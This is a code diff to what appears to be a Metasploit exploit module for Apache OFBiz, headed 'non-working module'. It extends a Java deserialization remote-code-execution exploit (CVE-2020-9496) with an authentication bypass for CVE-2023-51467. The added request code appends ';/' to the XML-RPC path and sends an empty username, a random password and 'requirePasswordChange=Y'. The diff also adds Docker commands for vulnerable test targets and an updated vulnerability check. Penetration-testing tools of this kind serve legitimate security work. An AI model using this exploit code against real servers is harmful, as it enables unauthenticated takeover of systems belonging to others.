non-working module

documentation/modules/exploit/linux/http/apache_ofbiz_deserialization.md

@@ -8,10 +8,16 @@ versions prior to 17.12.04.
 
 ### Setup
 
+#### 15.12
+
 You can use <https://hub.docker.com/r/opensourceknight/ofbiz>.
 
 1. Initialize the database with demo data (`INIT_DB=2`) and bind to ports 8080 and 8443
-    * `docker run -p 8080:8080 -p 8443:8443  --rm -e INIT_DB=2 opensourceknight/ofbiz:15.12`
+    * `docker run -p 8080:8080 -p 8443:8443 --rm -e INIT_DB=2 opensourceknight/ofbiz:15.12`
+
+#### 18.12.09
+
+`docker run -p 8080:8080 -p 8443:8443 --rm -e INIT_DB=2 opensourceknight/ofbiz:18.12`
 
 ## Verification Steps
 

modules/exploits/linux/http/apache_ofbiz_deserialization.rb

@@ -21,16 +21,21 @@ def initialize(info = {})
           This module exploits a Java deserialization vulnerability in Apache
           OFBiz's unauthenticated XML-RPC endpoint /webtools/control/xmlrpc for
           versions prior to 17.12.04.
+          Versions up to 18.12.11 are exploitable utilizing an auth bypass CVE-2023-51467.
         },
         'Author' => [
           'Alvaro Muñoz', # Discovery
-          'wvu' # Exploit
+          'wvu', # Exploit
+          'h00die' # cve-2023-49070
         ],
         'References' => [
           ['CVE', '2020-9496'],
+          ['CVE', '2023-49070'], # auth bypass update
+          ['CVE', '2023-51467'], # auth bypass update
           ['URL', 'https://securitylab.github.com/advisories/GHSL-2020-069-apache_ofbiz'],
           ['URL', 'https://ofbiz.apache.org/release-notes-17.12.04.html'],
-          ['URL', 'https://issues.apache.org/jira/browse/OFBIZ-11716']
+          ['URL', 'https://issues.apache.org/jira/browse/OFBIZ-11716'],
+          ['URL', 'https://blog.sonicwall.com/en-us/2023/12/sonicwall-discovers-critical-apache-ofbiz-zero-day-authbiz/'] # auth bypass
         ],
         'DisclosureDate' => '2020-07-13', # Vendor release note
         'License' => MSF_LICENSE,
@@ -76,21 +81,27 @@ def initialize(info = {})
 
     register_options([
       Opt::RPORT(8443),
-      OptString.new('TARGETURI', [true, 'Base path', '/'])
+      OptString.new('TARGETURI', [true, 'Base path', '/']),
+      OptBool.new('AUTHBYPASS', [true, 'Utilize CVE-2023-51467', true])
     ])
   end
 
   def check
     # Send an empty serialized object
     res = send_request_xmlrpc('')
 
-    unless res
-      return CheckCode::Unknown('Target did not respond to check.')
-    end
+    return CheckCode::Unknown('Target did not respond to check.') unless res
 
-    if res.body.include?('Failed to read result object: null')
-      return CheckCode::Vulnerable('Target can deserialize arbitrary data.')
-    end
+    return CheckCode::Vulnerable('Target can deserialize arbitrary data.') if res.body.include?('Failed to read result object: null')
+
+    # newer versions respond w/o a content length, so try just a gest
+    res = send_request_cgi(
+      'uri' => normalize_uri(target_uri.path, '/webtools/control/xmlrpc')
+    )
+
+    return CheckCode::Unknown('Target did not respond to check.') unless res
+
+    return CheckCode::Detected('Apache OFBiz detected') if res.body.include?('Apache OFBiz.')
 
     CheckCode::Safe('Target cannot deserialize arbitrary data.')
   end
@@ -124,7 +135,7 @@ def execute_command(cmd, _opts = {})
   def send_request_xmlrpc(data)
     # http://xmlrpc.com/
     # https://ws.apache.org/xmlrpc/
-    send_request_cgi(
+    request = {
       'method' => 'POST',
       'uri' => normalize_uri(target_uri.path, '/webtools/control/xmlrpc'),
       'ctype' => 'text/xml',
@@ -148,7 +159,18 @@ def send_request_xmlrpc(data)
           </params>
         </methodCall>
       XML
-    )
+    }
+
+    if datastore['AUTHBYPASS']
+      request['uri'] = normalize_uri(target_uri.path, '/webtools/control/xmlrpc;/') # tack on ;/
+      request['vars_get'] = {
+        'USERNAME' => '',
+        'PASSWORD' => rand_text_alphanumeric(1..5),
+        'requirePasswordChange' => 'Y' # magic bypass string
+      }
+    end
+
+    send_request_cgi(request)
   end
 
 end